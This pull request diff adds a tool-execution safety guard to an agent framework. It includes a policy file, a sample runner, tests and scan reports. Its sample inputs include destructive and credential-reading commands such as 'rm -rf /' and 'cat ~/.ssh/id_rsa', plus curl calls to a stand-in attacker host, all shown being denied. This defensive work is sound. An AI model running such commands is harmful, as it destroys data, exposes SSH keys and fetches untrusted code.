### PR TITLE
tool/safety: add tool execution safety guard

### DIFF
--- a/examples/tool_safety_guard/README.md
+++ b/examples/tool_safety_guard/README.md
@@ -1,0 +1,64 @@
+# Tool Safety Guard
+
+This example demonstrates the `tool/safety` pre-execution guard for
+command-like tools. It scans workspace shell commands, host shell commands, and
+code execution blocks before the underlying tool runs.
+
+Run the bundled samples:
+
+```bash
+cd examples/tool_safety_guard
+go run . -policy tool_safety_policy.yaml -audit tool_safety_audit.jsonl
+```
+
+The example prints structured scan reports and appends one monitoring-friendly
+JSONL event per scan.
+
+## How It Fits
+
+`internal/shellsafe` is the conservative shell structure parser used by the
+guard. It rejects shell constructs that can bypass argv-level checks, including
+`sh -c`, `bash -c`, `eval`, backticks, `$()`, variable expansion, redirection,
+background operators, and unsupported control flow. The safety guard builds on
+that parser and adds policy checks for dangerous commands, denied paths, network
+allowlists, host execution risk, dependency installation, resource abuse, and
+secret leakage.
+
+`tool.PermissionPolicy` is the execution-time hook. Use
+`safety.NewPermissionPolicy(...)` as a run-level permission policy so
+`workspace_exec`, `exec_command` from hostexec, and `execute_code` are scanned
+before they execute. `deny` blocks execution. `needs_human_review` and `ask`
+map to the framework approval-required action.
+
+`workspaceexec` runs inside an executor workspace. That is a safer boundary than
+direct host execution, but it still needs command filtering, clean environment
+handling, output limits, and workspace file controls. `hostexec` runs through
+the host shell, so PTY sessions, background jobs, privilege changes, process
+cleanup, and environment isolation require stricter review. `codeexecutor` can
+execute code blocks through local, container, Jupyter, or other backends; code
+that bridges into shell execution should still be reviewed by the guard.
+
+When OpenTelemetry is enabled, callers can attach the report attributes returned
+by `Report.SpanAttributes()`:
+
+- `tool.safety.decision`
+- `tool.safety.risk_level`
+- `tool.safety.rule_id`
+- `tool.safety.backend`
+
+## Not A Sandbox
+
+This guard is a pre-execution filter and audit layer. It reduces obvious unsafe
+tool calls and produces structured evidence, but it cannot replace sandbox
+isolation. A scanner can miss novel obfuscation, language-specific behavior,
+runtime side effects, compromised dependencies, or vulnerabilities in tools
+after execution starts. Keep using sandbox file-system policy, network policy,
+process limits, clean environments, timeouts, output caps, and artifact
+redaction.
+
+## Policy
+
+`tool_safety_policy.yaml` controls allowed commands, denied commands, denied
+paths, network allowlists, maximum timeout, maximum output size, environment
+variable allowlist, and commands that require human review. Changing those
+fields does not require code changes.

--- a/examples/tool_safety_guard/README.md
+++ b/examples/tool_safety_guard/README.md
@@ -11,8 +11,10 @@ cd examples/tool_safety_guard
 go run . -policy tool_safety_policy.yaml -audit tool_safety_audit.jsonl
 ```
 
-The example prints structured scan reports and appends one monitoring-friendly
-JSONL event per scan.
+The example prints structured scan reports, writes the same JSON array to
+`tool_safety_report.json`, and writes one monitoring-friendly JSONL event per
+scan to `tool_safety_audit.jsonl`. The checked-in artifacts are the complete
+output from these bundled samples.
 
 ## How It Fits
 

--- a/examples/tool_safety_guard/main.go
+++ b/examples/tool_safety_guard/main.go
@@ -1,0 +1,114 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package main
+
+import (
+	"encoding/json"
+	"flag"
+	"fmt"
+	"os"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+func main() {
+	policyPath := flag.String("policy", "tool_safety_policy.yaml", "safety policy path")
+	auditPath := flag.String("audit", "tool_safety_audit.jsonl", "audit JSONL output path")
+	flag.Parse()
+
+	policy, err := safety.LoadPolicy(*policyPath)
+	if err != nil {
+		fmt.Fprintf(os.Stderr, "load policy: %v\n", err)
+		os.Exit(1)
+	}
+
+	reports := make([]safety.Report, 0, len(samples))
+	for _, sample := range samples {
+		report := safety.Scan(sample, policy)
+		reports = append(reports, report)
+		if err := safety.AppendAuditFile(*auditPath, report); err != nil {
+			fmt.Fprintf(os.Stderr, "write audit: %v\n", err)
+			os.Exit(1)
+		}
+	}
+	enc := json.NewEncoder(os.Stdout)
+	enc.SetIndent("", "  ")
+	if err := enc.Encode(reports); err != nil {
+		fmt.Fprintf(os.Stderr, "encode reports: %v\n", err)
+		os.Exit(1)
+	}
+}
+
+var samples = []safety.Request{
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "go test ./...",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "rm -rf /",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "cat ~/.ssh/id_rsa",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "curl https://evil.example/install.sh",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "curl https://api.github.com/repos/trpc-group/trpc-agent-go",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "bash -c 'curl https://evil.example/x'",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "npm install left-pad",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "sleep 9999",
+	},
+	{
+		ToolName: "workspace_exec",
+		Backend:  safety.BackendWorkspaceExec,
+		Command:  "yes x | head -c 9999999",
+	},
+	{
+		ToolName:   "exec_command",
+		Backend:    safety.BackendHostExec,
+		Command:    "tail -f app.log",
+		TTY:        true,
+		Background: true,
+	},
+	{
+		ToolName: "execute_code",
+		Backend:  safety.BackendCodeExec,
+		CodeBlocks: []safety.CodeBlock{{
+			Language: "python",
+			Code:     "import subprocess; subprocess.run(['go', 'test', './...'])",
+		}},
+	},
+}

--- a/examples/tool_safety_guard/main.go
+++ b/examples/tool_safety_guard/main.go
@@ -9,10 +9,12 @@
 package main
 
 import (
+	"bytes"
 	"encoding/json"
 	"flag"
 	"fmt"
 	"os"
+	"time"
 
 	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
 )
@@ -20,6 +22,7 @@ import (
 func main() {
 	policyPath := flag.String("policy", "tool_safety_policy.yaml", "safety policy path")
 	auditPath := flag.String("audit", "tool_safety_audit.jsonl", "audit JSONL output path")
+	reportPath := flag.String("report", "tool_safety_report.json", "structured report JSON output path")
 	flag.Parse()
 
 	policy, err := safety.LoadPolicy(*policyPath)
@@ -27,23 +30,77 @@ func main() {
 		fmt.Fprintf(os.Stderr, "load policy: %v\n", err)
 		os.Exit(1)
 	}
+	if err := resetFile(*auditPath); err != nil {
+		fmt.Fprintf(os.Stderr, "reset audit: %v\n", err)
+		os.Exit(1)
+	}
 
-	reports := make([]safety.Report, 0, len(samples))
-	for _, sample := range samples {
-		report := safety.Scan(sample, policy)
-		reports = append(reports, report)
-		if err := safety.AppendAuditFile(*auditPath, report); err != nil {
+	reports := sampleReports(policy)
+	for _, report := range reports {
+		if err := appendAuditFileAt(*auditPath, report, sampleTimestamp); err != nil {
 			fmt.Fprintf(os.Stderr, "write audit: %v\n", err)
 			os.Exit(1)
 		}
 	}
-	enc := json.NewEncoder(os.Stdout)
-	enc.SetIndent("", "  ")
-	if err := enc.Encode(reports); err != nil {
+	reportBytes, err := encodeReports(reports)
+	if err != nil {
 		fmt.Fprintf(os.Stderr, "encode reports: %v\n", err)
 		os.Exit(1)
 	}
+	if err := os.WriteFile(*reportPath, reportBytes, 0o600); err != nil {
+		fmt.Fprintf(os.Stderr, "write reports: %v\n", err)
+		os.Exit(1)
+	}
+	if _, err := os.Stdout.Write(reportBytes); err != nil {
+		fmt.Fprintf(os.Stderr, "print reports: %v\n", err)
+		os.Exit(1)
+	}
 }
+
+func encodeReports(reports []safety.Report) ([]byte, error) {
+	var buf bytes.Buffer
+	enc := json.NewEncoder(&buf)
+	enc.SetIndent("", "  ")
+	if err := enc.Encode(reports); err != nil {
+		return nil, err
+	}
+	return buf.Bytes(), nil
+}
+
+func resetFile(path string) error {
+	if path == "" {
+		return nil
+	}
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0o600)
+	if err != nil {
+		return err
+	}
+	return f.Close()
+}
+
+func appendAuditFileAt(path string, report safety.Report, now time.Time) error {
+	if path == "" {
+		return nil
+	}
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0o600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	return json.NewEncoder(f).Encode(report.AuditEvent(now))
+}
+
+func sampleReports(policy safety.Policy) []safety.Report {
+	reports := make([]safety.Report, 0, len(samples))
+	for _, sample := range samples {
+		report := safety.Scan(sample, policy)
+		report.DurationMillis = 0
+		reports = append(reports, report)
+	}
+	return reports
+}
+
+var sampleTimestamp = time.Date(2026, 7, 4, 0, 0, 0, 0, time.UTC)
 
 var samples = []safety.Request{
 	{

--- a/examples/tool_safety_guard/main_test.go
+++ b/examples/tool_safety_guard/main_test.go
@@ -1,0 +1,50 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package main
+
+import (
+	"bytes"
+	"encoding/json"
+	"os"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool/safety"
+)
+
+func TestCheckedInArtifactsMatchSamples(t *testing.T) {
+	policy, err := safety.LoadPolicy("tool_safety_policy.yaml")
+	if err != nil {
+		t.Fatalf("LoadPolicy() error = %v", err)
+	}
+	got, err := encodeReports(sampleReports(policy))
+	if err != nil {
+		t.Fatalf("encodeReports() error = %v", err)
+	}
+	want, err := os.ReadFile("tool_safety_report.json")
+	if err != nil {
+		t.Fatalf("ReadFile(report) error = %v", err)
+	}
+	if !bytes.Equal(got, want) {
+		t.Fatalf("tool_safety_report.json does not match generated samples")
+	}
+
+	var gotAudit bytes.Buffer
+	for _, report := range sampleReports(policy) {
+		if err := json.NewEncoder(&gotAudit).Encode(report.AuditEvent(sampleTimestamp)); err != nil {
+			t.Fatalf("Encode(audit) error = %v", err)
+		}
+	}
+	wantAudit, err := os.ReadFile("tool_safety_audit.jsonl")
+	if err != nil {
+		t.Fatalf("ReadFile(audit) error = %v", err)
+	}
+	if !bytes.Equal(gotAudit.Bytes(), wantAudit) {
+		t.Fatalf("tool_safety_audit.jsonl does not match generated samples")
+	}
+}

--- a/examples/tool_safety_guard/main_test.go
+++ b/examples/tool_safety_guard/main_test.go
@@ -44,7 +44,11 @@ func TestCheckedInArtifactsMatchSamples(t *testing.T) {
 	if err != nil {
 		t.Fatalf("ReadFile(audit) error = %v", err)
 	}
-	if !bytes.Equal(gotAudit.Bytes(), wantAudit) {
+	if !bytes.Equal(normalizeNewlines(gotAudit.Bytes()), normalizeNewlines(wantAudit)) {
 		t.Fatalf("tool_safety_audit.jsonl does not match generated samples")
 	}
+}
+
+func normalizeNewlines(in []byte) []byte {
+	return bytes.ReplaceAll(in, []byte("\r\n"), []byte("\n"))
 }

--- a/examples/tool_safety_guard/tool_safety_audit.jsonl
+++ b/examples/tool_safety_guard/tool_safety_audit.jsonl
@@ -1,1 +1,12 @@
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"allow","risk_level":"low","duration_ms":0,"redacted":false,"blocked":false,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"critical","rule_id":"dangerous.rm_rf","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"critical","rule_id":"sensitive.path_access","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
 {"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"network.non_whitelisted_domain","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"allow","risk_level":"low","duration_ms":0,"redacted":false,"blocked":false,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"shell.bypass","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"needs_human_review","risk_level":"medium","rule_id":"shell.pipeline_review","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"needs_human_review","risk_level":"medium","rule_id":"dependency.environment_change","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"needs_human_review","risk_level":"medium","rule_id":"resource.long_sleep","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"resource.large_output","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"exec_command","decision":"needs_human_review","risk_level":"high","rule_id":"hostexec.long_session","duration_ms":0,"redacted":false,"blocked":true,"backend":"hostexec"}
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"execute_code","decision":"needs_human_review","risk_level":"medium","rule_id":"codeexec.host_command_bridge","duration_ms":0,"redacted":false,"blocked":true,"backend":"codeexec"}

--- a/examples/tool_safety_guard/tool_safety_audit.jsonl
+++ b/examples/tool_safety_guard/tool_safety_audit.jsonl
@@ -1,0 +1,1 @@
+{"timestamp":"2026-07-04T00:00:00Z","tool_name":"workspace_exec","decision":"deny","risk_level":"high","rule_id":"network.non_whitelisted_domain","duration_ms":0,"redacted":false,"blocked":true,"backend":"workspaceexec"}

--- a/examples/tool_safety_guard/tool_safety_policy.yaml
+++ b/examples/tool_safety_guard/tool_safety_policy.yaml
@@ -1,0 +1,77 @@
+allowed_commands:
+  - go
+  - curl
+  - cat
+  - wc
+  - npm
+  - sleep
+  - yes
+  - head
+  - tail
+  - python
+denied_commands:
+  - dd
+  - mkfs
+  - mount
+  - umount
+  - shutdown
+  - reboot
+  - halt
+  - poweroff
+  - sudo
+  - su
+  - doas
+denied_paths:
+  - /
+  - /bin
+  - /boot
+  - /dev
+  - /etc
+  - /root
+  - /sbin
+  - /sys
+  - /usr
+  - /var
+  - ~/.ssh
+  - .ssh
+  - .env
+  - .npmrc
+  - .pypirc
+  - id_rsa
+  - id_ed25519
+  - credentials
+  - secrets
+network_allowlist:
+  - api.github.com
+  - github.com
+  - proxy.golang.org
+  - sum.golang.org
+  - registry.npmjs.org
+  - pypi.org
+  - files.pythonhosted.org
+max_timeout_seconds: 300
+max_output_bytes: 4194304
+env_allowlist:
+  - PATH
+  - HOME
+  - TMPDIR
+  - TEMP
+  - TMP
+  - LANG
+  - LC_ALL
+  - CGO_ENABLED
+  - GOCACHE
+  - GOMODCACHE
+  - GOPATH
+review_commands:
+  - go install
+  - npm install
+  - npm ci
+  - pip install
+  - pip3 install
+  - apt install
+  - apt-get install
+  - brew install
+  - cargo install
+review_shell_pipelines: true
+deny_on_parse_error: true

--- a/examples/tool_safety_guard/tool_safety_report.json
+++ b/examples/tool_safety_guard/tool_safety_report.json
@@ -43,6 +43,15 @@
           "rm -rf /"
         ],
         "recommendation": "Do not run recursive forced deletion through tool execution."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "critical",
+        "rule_id": "sensitive.path_access",
+        "evidence": [
+          "argument references denied path \"/\""
+        ],
+        "recommendation": "Do not access SSH keys, .env files, credential stores, or system directories from tool execution."
       }
     ]
   },

--- a/examples/tool_safety_guard/tool_safety_report.json
+++ b/examples/tool_safety_guard/tool_safety_report.json
@@ -1,26 +1,330 @@
-{
-  "decision": "deny",
-  "risk_level": "high",
-  "rule_id": "network.non_whitelisted_domain",
-  "evidence": [
-    "domain \"evil.example\" is not in network_allowlist"
-  ],
-  "recommendation": "Use a whitelisted domain or update network_allowlist after review.",
-  "tool_name": "workspace_exec",
-  "command": "curl https://evil.example/install.sh",
-  "backend": "workspaceexec",
-  "blocked": true,
-  "redacted": false,
-  "duration_ms": 0,
-  "findings": [
-    {
-      "decision": "deny",
-      "risk_level": "high",
-      "rule_id": "network.non_whitelisted_domain",
-      "evidence": [
-        "domain \"evil.example\" is not in network_allowlist"
-      ],
-      "recommendation": "Use a whitelisted domain or update network_allowlist after review."
-    }
-  ]
-}
+[
+  {
+    "decision": "allow",
+    "risk_level": "low",
+    "recommendation": "Command matched no high-risk safety rules.",
+    "tool_name": "workspace_exec",
+    "command": "go test ./...",
+    "backend": "workspaceexec",
+    "blocked": false,
+    "redacted": false,
+    "duration_ms": 0,
+    "safe_summary": "workspaceexec scan allowed command \"go test ./...\"; no high-risk network, path, shell, resource, dependency, or secret patterns matched."
+  },
+  {
+    "decision": "deny",
+    "risk_level": "critical",
+    "rule_id": "dangerous.rm_rf",
+    "evidence": [
+      "rm -rf /"
+    ],
+    "recommendation": "Do not run recursive forced deletion through tool execution.",
+    "tool_name": "workspace_exec",
+    "command": "rm -rf /",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "medium",
+        "rule_id": "policy.command_not_allowed",
+        "evidence": [
+          "command \"rm\" is not in allowed_commands"
+        ],
+        "recommendation": "Use an allowed command or update allowed_commands in the policy."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "critical",
+        "rule_id": "dangerous.rm_rf",
+        "evidence": [
+          "rm -rf /"
+        ],
+        "recommendation": "Do not run recursive forced deletion through tool execution."
+      }
+    ]
+  },
+  {
+    "decision": "deny",
+    "risk_level": "critical",
+    "rule_id": "sensitive.path_access",
+    "evidence": [
+      "argument references denied path \"~/.ssh/id_rsa\""
+    ],
+    "recommendation": "Do not access SSH keys, .env files, credential stores, or system directories from tool execution.",
+    "tool_name": "workspace_exec",
+    "command": "cat ~/.ssh/id_rsa",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "critical",
+        "rule_id": "sensitive.path_access",
+        "evidence": [
+          "argument references denied path \"~/.ssh/id_rsa\""
+        ],
+        "recommendation": "Do not access SSH keys, .env files, credential stores, or system directories from tool execution."
+      }
+    ]
+  },
+  {
+    "decision": "deny",
+    "risk_level": "high",
+    "rule_id": "network.non_whitelisted_domain",
+    "evidence": [
+      "domain \"evil.example\" is not in network_allowlist"
+    ],
+    "recommendation": "Use a whitelisted domain or update network_allowlist after review.",
+    "tool_name": "workspace_exec",
+    "command": "curl https://evil.example/install.sh",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "network.non_whitelisted_domain",
+        "evidence": [
+          "domain \"evil.example\" is not in network_allowlist"
+        ],
+        "recommendation": "Use a whitelisted domain or update network_allowlist after review."
+      }
+    ]
+  },
+  {
+    "decision": "allow",
+    "risk_level": "low",
+    "recommendation": "Command matched no high-risk safety rules.",
+    "tool_name": "workspace_exec",
+    "command": "curl https://api.github.com/repos/trpc-group/trpc-agent-go",
+    "backend": "workspaceexec",
+    "blocked": false,
+    "redacted": false,
+    "duration_ms": 0,
+    "safe_summary": "workspaceexec scan allowed command \"curl https://api.github.com/repos/trpc-group/trpc-agent-go\"; no high-risk network, path, shell, resource, dependency, or secret patterns matched."
+  },
+  {
+    "decision": "deny",
+    "risk_level": "high",
+    "rule_id": "shell.bypass",
+    "evidence": [
+      "command contains shell bypass syntax or wrapper"
+    ],
+    "recommendation": "Avoid sh -c, bash -c, eval, backticks, $(), variable expansion, redirections, and process substitutions in tool commands.",
+    "tool_name": "workspace_exec",
+    "command": "bash -c 'curl https://evil.example/x'",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "shell.bypass",
+        "evidence": [
+          "command contains shell bypass syntax or wrapper"
+        ],
+        "recommendation": "Avoid sh -c, bash -c, eval, backticks, $(), variable expansion, redirections, and process substitutions in tool commands."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "network.non_whitelisted_domain",
+        "evidence": [
+          "domain \"evil.example\" is not in network_allowlist"
+        ],
+        "recommendation": "Use a whitelisted domain or update network_allowlist after review."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "medium",
+        "rule_id": "policy.command_not_allowed",
+        "evidence": [
+          "command \"bash\" is not in allowed_commands"
+        ],
+        "recommendation": "Use an allowed command or update allowed_commands in the policy."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "shell.pipeline_review",
+    "evidence": [
+      "command contains a shell pipeline or command chain"
+    ],
+    "recommendation": "Review multi-stage shell commands manually or replace them with a small audited script.",
+    "tool_name": "workspace_exec",
+    "command": "cat README.md | wc -l",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "shell.pipeline_review",
+        "evidence": [
+          "command contains a shell pipeline or command chain"
+        ],
+        "recommendation": "Review multi-stage shell commands manually or replace them with a small audited script."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "dependency.environment_change",
+    "evidence": [
+      "command starts with \"npm install\""
+    ],
+    "recommendation": "Dependency installation or environment mutation should be reviewed and pinned before execution.",
+    "tool_name": "workspace_exec",
+    "command": "npm install left-pad",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "dependency.environment_change",
+        "evidence": [
+          "command starts with \"npm install\""
+        ],
+        "recommendation": "Dependency installation or environment mutation should be reviewed and pinned before execution."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "resource.long_sleep",
+    "evidence": [
+      "command contains a long sleep"
+    ],
+    "recommendation": "Use a shorter sleep or a bounded wait condition.",
+    "tool_name": "workspace_exec",
+    "command": "sleep 9999",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "resource.long_sleep",
+        "evidence": [
+          "command contains a long sleep"
+        ],
+        "recommendation": "Use a shorter sleep or a bounded wait condition."
+      }
+    ]
+  },
+  {
+    "decision": "deny",
+    "risk_level": "high",
+    "rule_id": "resource.large_output",
+    "evidence": [
+      "command appears to generate output above the policy limit"
+    ],
+    "recommendation": "Limit output size, write bounded artifacts, or raise the policy limit after review.",
+    "tool_name": "workspace_exec",
+    "command": "yes x | head -c 9999999",
+    "backend": "workspaceexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "shell.pipeline_review",
+        "evidence": [
+          "command contains a shell pipeline or command chain"
+        ],
+        "recommendation": "Review multi-stage shell commands manually or replace them with a small audited script."
+      },
+      {
+        "decision": "deny",
+        "risk_level": "high",
+        "rule_id": "resource.large_output",
+        "evidence": [
+          "command appears to generate output above the policy limit"
+        ],
+        "recommendation": "Limit output size, write bounded artifacts, or raise the policy limit after review."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "high",
+    "rule_id": "hostexec.long_session",
+    "evidence": [
+      "hostexec requested background or PTY execution"
+    ],
+    "recommendation": "Require human approval for host PTY/background sessions and ensure timeout, process-group cleanup, and output caps are enforced.",
+    "tool_name": "exec_command",
+    "command": "tail -f app.log",
+    "backend": "hostexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "high",
+        "rule_id": "hostexec.long_session",
+        "evidence": [
+          "hostexec requested background or PTY execution"
+        ],
+        "recommendation": "Require human approval for host PTY/background sessions and ensure timeout, process-group cleanup, and output caps are enforced."
+      },
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "process.background",
+        "evidence": [
+          "command may leave a background process behind"
+        ],
+        "recommendation": "Run foreground commands with a bounded timeout, or record the session id and cleanup plan."
+      }
+    ]
+  },
+  {
+    "decision": "needs_human_review",
+    "risk_level": "medium",
+    "rule_id": "codeexec.host_command_bridge",
+    "evidence": [
+      "python code can launch shell commands"
+    ],
+    "recommendation": "Review code that bridges from code execution into shell execution.",
+    "tool_name": "execute_code",
+    "backend": "codeexec",
+    "blocked": true,
+    "redacted": false,
+    "duration_ms": 0,
+    "findings": [
+      {
+        "decision": "needs_human_review",
+        "risk_level": "medium",
+        "rule_id": "codeexec.host_command_bridge",
+        "evidence": [
+          "python code can launch shell commands"
+        ],
+        "recommendation": "Review code that bridges from code execution into shell execution."
+      }
+    ]
+  }
+]

--- a/examples/tool_safety_guard/tool_safety_report.json
+++ b/examples/tool_safety_guard/tool_safety_report.json
@@ -1,0 +1,26 @@
+{
+  "decision": "deny",
+  "risk_level": "high",
+  "rule_id": "network.non_whitelisted_domain",
+  "evidence": [
+    "domain \"evil.example\" is not in network_allowlist"
+  ],
+  "recommendation": "Use a whitelisted domain or update network_allowlist after review.",
+  "tool_name": "workspace_exec",
+  "command": "curl https://evil.example/install.sh",
+  "backend": "workspaceexec",
+  "blocked": true,
+  "redacted": false,
+  "duration_ms": 0,
+  "findings": [
+    {
+      "decision": "deny",
+      "risk_level": "high",
+      "rule_id": "network.non_whitelisted_domain",
+      "evidence": [
+        "domain \"evil.example\" is not in network_allowlist"
+      ],
+      "recommendation": "Use a whitelisted domain or update network_allowlist after review."
+    }
+  ]
+}

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -1,0 +1,241 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"strings"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// PermissionOption configures the PermissionPolicy wrapper.
+type PermissionOption func(*PermissionPolicy)
+
+// PermissionPolicy scans command-like tools before they execute.
+type PermissionPolicy struct {
+	policy    Policy
+	auditPath string
+	audit     io.Writer
+}
+
+// NewPermissionPolicy returns a tool.PermissionPolicy that maps safety scan
+// decisions onto the framework allow / deny / ask actions.
+func NewPermissionPolicy(policy Policy, opts ...PermissionOption) *PermissionPolicy {
+	p := &PermissionPolicy{policy: policy.withDefaults()}
+	for _, opt := range opts {
+		if opt != nil {
+			opt(p)
+		}
+	}
+	return p
+}
+
+// WithAuditPath appends one JSONL audit event per scan to path.
+func WithAuditPath(path string) PermissionOption {
+	return func(p *PermissionPolicy) { p.auditPath = path }
+}
+
+// WithAuditWriter writes one JSONL audit event per scan to w.
+func WithAuditWriter(w io.Writer) PermissionOption {
+	return func(p *PermissionPolicy) { p.audit = w }
+}
+
+// CheckToolPermission implements tool.PermissionPolicy.
+func (p *PermissionPolicy) CheckToolPermission(
+	ctx context.Context,
+	req *tool.PermissionRequest,
+) (tool.PermissionDecision, error) {
+	_ = ctx
+	if p == nil {
+		return tool.AllowPermission(), nil
+	}
+	scanReq, ok, err := RequestFromPermissionRequest(req)
+	if err != nil {
+		return tool.DenyPermission(err.Error()), nil
+	}
+	if !ok {
+		return tool.AllowPermission(), nil
+	}
+	report := Scan(scanReq, p.policy)
+	if err := p.writeAudit(report); err != nil {
+		return tool.PermissionDecision{}, err
+	}
+	switch report.Decision {
+	case DecisionAllow:
+		return tool.AllowPermission(), nil
+	case DecisionDeny:
+		return tool.DenyPermission(permissionReason(report)), nil
+	case DecisionAsk, DecisionNeedsHumanReview:
+		return tool.AskPermission(permissionReason(report)), nil
+	default:
+		return tool.DenyPermission("tool safety guard returned an unknown decision"), nil
+	}
+}
+
+func (p *PermissionPolicy) writeAudit(report Report) error {
+	if p.audit != nil {
+		if err := WriteAuditJSONL(p.audit, report); err != nil {
+			return err
+		}
+	}
+	return AppendAuditFile(p.auditPath, report)
+}
+
+func permissionReason(report Report) string {
+	if len(report.Evidence) == 0 {
+		return fmt.Sprintf(
+			"tool safety guard %s: %s",
+			report.Decision, report.Recommendation)
+	}
+	return fmt.Sprintf(
+		"tool safety guard %s (%s/%s): %s; %s",
+		report.Decision, report.RiskLevel, report.RuleID,
+		strings.Join(report.Evidence, "; "), report.Recommendation)
+}
+
+// RequestFromPermissionRequest extracts command/code execution inputs from a
+// framework permission request.
+func RequestFromPermissionRequest(
+	req *tool.PermissionRequest,
+) (Request, bool, error) {
+	if req == nil {
+		return Request{}, false, nil
+	}
+	toolName := req.ToolName
+	if toolName == "" && req.Declaration != nil {
+		toolName = req.Declaration.Name
+	}
+	if toolName == "" {
+		return Request{}, false, nil
+	}
+	base := Request{
+		ToolName: toolName,
+		Metadata: ToolMetadata{
